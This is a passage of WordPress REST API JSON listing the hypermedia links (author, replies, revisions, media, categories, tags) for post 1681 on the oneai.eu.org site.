/v2\/posts"}],"about":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1681"}],"version-history":[{"count":1,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1681\/revisions"}],"predecessor-version":[{"id":1682,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1681\/revisions\/1682"}],"wp:attachment":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1681"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1681"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}